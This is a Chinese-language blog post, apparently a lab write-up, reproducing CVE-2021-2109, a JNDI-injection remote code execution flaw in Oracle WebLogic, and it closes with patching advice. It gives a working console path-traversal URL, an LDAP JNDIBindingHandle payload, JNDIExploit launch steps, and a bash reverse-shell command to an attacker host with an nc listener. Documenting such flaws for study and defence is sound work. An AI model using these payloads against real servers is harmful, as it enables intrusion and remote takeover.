Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现

0x01 漏洞简介

   一. 漏洞描述
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
       该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

   二. 影响版本

  • Weblogic Server 10.3.6.0.0
  • Weblogic Server 12.1.3.0.0
  • Weblogic Server 12.2.1.3.0
  • Weblogic Server 12.2.1.4.0
  • Weblogic Server 14.1.1.0.0

   三.JNDI简介

JNDI是Java Naming and Directory Interface  (Java命名和目录接口)的英文简写, 是为Java应用程序提供命名和目录访问服务的API  (application programing interface,应用程序编 程接口)

0x02 漏洞复现

  1.所需机器

靶机:Centos7(192.168.166.129)

攻击机:win10

LDAP服务器:自己的服务器

   所需工具:        lDAP工具 

     链接:https://pan.baidu.com/s/17Aa-3dMzcf4R_QPkl2xXTA 
     提取码:wars                     

     此处注意:要让自己的vps防火墙放行1389和8080端口,否则无法回显

  2环境搭建

Centos7 中搭建环境

      1.可以使用Vulhub的CVE-2020-14882(weblogic:12.2.1.3版本)漏洞环境来复现

1.cd /Desktop/vulhub-master/weblogic/CVE-2020-14882

2.docker-compose up -d

访问出现以下图片即搭建成功

  3 win10开始攻击:

进行路径拼接:

 http://192.168.166.129:7001/console/css/%252e%252e%252f/consolejndi.portal  

出现以下界面说明漏洞

  启动LDAP:             

                                    JDK版本不要过高(此处所用JDK8)

                          启动命令:    java -jar JNDIExploit.v1.11.jar -i ip(vps ip)  

   

 在攻击机进行抓包,构造payload进行远程命令执行

payload注意点:1.在bp中修改为post请求方式

                          2.添加字段cmd:whoami(此处命令可修改)

                          3.在payload中ip处第三个分隔符是;(此处一定要注意,否则执行不了)

                                           例子:192.168.1;1(第三处为分号)

                          4.payload我会放在文末

构造payload进行发送之后,发现命令成功执行,看下图(vps上监听会回显,作者没有截图):

 4 通过反弹shell连接主机

       1.对反弹shell命令进行编码

     bash -i >& /dev/tcp/xx.xx.xx.xx/1122 0>&1       (ip为接收shell的ip)

    编码地址:  java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

         2.nc 监听

nc -lvvp 1122   (端口看自己定)

         3.在bp上抓包发送数据,发现反弹成功 (字段cmd后为编码过后的反弹shell命令)

 

      5 POC这里不进行展示了,在上面的百度网盘中

0x03  Payload

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)

0x04 漏洞修复

1.此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

2.建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。

3、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值